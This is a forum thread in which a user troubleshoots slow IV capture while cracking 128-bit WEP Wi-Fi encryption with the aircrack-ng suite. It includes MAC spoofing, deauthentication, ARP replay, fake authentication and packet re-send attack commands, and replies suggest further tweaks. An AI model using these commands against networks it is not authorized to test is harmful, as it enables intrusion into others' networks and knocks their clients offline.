slow data collection on 128bit wep cracking.
I will start with my commands
airmon-ng stop (NIC)
ifconfig (NIC) down
macchanger -m 00:11:22:33:44:55 (NIC)
airmon-ng start (NIC)
airodump-ng -c (channel mine is on is 8) -w (filename) --bssid (xx:xx...)(NIC)
aireplay-ng -0 10 -a (bssid) -c (client mac)(NIC)
aireplay-ng -3 -b (Bssid) -h (spoofed mac) (NIC)
Everywhere i have seen from the video tutorials and such is that the IVs come a little faster than mine. I had my config go for 2h 45min and only got 9k IVs, not nearly enough to even try to crack yet. Just wondering if this is normal or if there is somthing wrong with my configs.
also the aircrack command i use is aircrack-ng (filename)
any help will be greatly appreciated
You need to capture an ARP Request and replay it to force the Access Point to pump out more IV's
Originally Posted by squeek67
try this command aireplay-ng -3 -b BSSID of the access point -h and then a fake or a spoofed mac address followed by you network interface
I am guessing you already fake authorized with the AP? if not you have to send out packets asking to authorize to the access point as a client.
aireplay-ng -1 0 -e belkin54g -a (BSSID of the ap) -h (fake mac address) then your network interface
if that doesnt work you can always do interactive packet replay to create your own packets
Also another useful attack you might try is the re-send all data attack, basically you are asking the AP to re-send you everything. This only works if the AP re-encrypts the packets before sending them again (and therefore giving you a new IV).
aireplay -2 -b <AP MAC> -h <Client MAC> -n 100 -p 0841 -c FF:FF:FF:FF:FF:FF ath0
How far away from the AP are you?
Maybe you could tell us your machine specs and the type of adapter you are using.